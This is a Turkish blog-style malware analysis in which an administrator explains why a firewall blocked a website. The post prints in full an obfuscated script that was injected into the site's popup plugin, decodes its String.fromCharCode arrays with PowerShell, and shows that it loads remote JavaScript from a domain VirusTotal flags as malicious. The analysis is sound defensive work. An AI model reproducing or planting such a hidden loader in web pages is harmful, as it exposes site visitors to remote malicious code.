Kodlanmış betikler

Girilmek istenen web sitelerinden birisi güvenlik duvarı üzerinde zararlı kod olarak sınıflandırılıyor ve engelleniyordu. Tekrar incelenmesini istedim, ısrarla zararlı içerik olduğu belirtildi. Virustotal'de bu görüşü destekleyecek bir sonuç göremedim. Google Safe Browsing'de de.

https://sitecheck.sucuri.net ile yaptığım taramada sitenin içinde kodlanmış betik parçası buldum (dikkat, zararlı içerik barındırır!):

  <script id="sgpb-custom-script-676">
    sgAddEvent(window, "sgpbWillOpen", function (e) {
      if (e.detail.popupId == "676") {
        (function () {
          var elem = document.createElement(
            String.fromCharCode(115, 99, 114, 105, 112, 116)
          );
          elem.type = String.fromCharCode(
            116,
            101,
            120,
            116,
            47,
            106,
            97,
            118,
            97,
            115,
            99,
            114,
            105,
            112,
            116
          );
          elem.src = String.fromCharCode(
            104,
            116,
            116,
            112,
            115,
            58,
            47,
            47,
            100,
            114,
            111,
            112,
            46,
            100,
            111,
            110,
            116,
            115,
            116,
            111,
            112,
            116,
            104,
            105,
            115,
            109,
            117,
            115,
            105,
            99,
            115,
            46,
            99,
            111,
            109,
            47,
            100,
            114,
            111,
            112,
            46,
            106,
            115,
            63,
            116,
            61,
            49
          );
          document
            .getElementsByTagName(String.fromCharCode(104, 101, 97, 100))[0]
            .appendChild(elem);
        })();
      }
    });
</script>

Bu zararsız gibi görünen betiğin içinde kısaca şu işlemler var:

var elem = document.createElement(
            String.fromCharCode(115, 99, 114, 105, 112, 116)

Burada yeni bir DOM öğesi oluşturuluyor. fromCharCode() fonksiyonunun içindeki tamsayıları  Powershell yardımıyla bir değişkene atadım:

PS> $d = (115,99,114,105,112,116)

daha sonra bunları şu şekilde bir string veri tipine dönüştürdüm:

PS> $a=""; $d | % { $a = $a + [char]$_ }; $a 

Sonuç bir html betik etiketi: script

Sonraki adıma geçtim. Bu sefer de elem.type'ın satırındaki tam sayı dizisi için aynı işlemi yaptım:

PS> $d = (116,101,120,116,47,106,97,118,97,115,99,114,105,112,116)

daha sonra bunları şu şekilde string veri tipine dönüştürdüm:

PS> $a=""; $d | % { $a = $a + [char]$_ };$a

Buradan da text/javascript çıktı.

Nihayet sıra vurucu kısma geldi; üçüncü adımda elem.src'yi decode ettim oradan da https://drop.dontstopthismusics.com/drop.js?t=1 gibi bir adres çıktı. Nihayet bu üçü bir html etiketi olarak bir sonraki adımda appenChild ile DOM yapısına ekleniyor. Yani standart bir şekilde listelenmeyen bir script alt bileşenimiz ortaya çıkıyor.

Virustotal'de bu URL'i taradığımda ise şu sonuç çıktı:

 

Evet, bu adres zararlı içerik olarak sınıflandırıldı. Şu anda ulaşılabilir olmadığı için içeriğini göremiyorum. Ama bir ara ulaşılabiliyormuş ki zararlı olarak sınıflandırılabilmiş.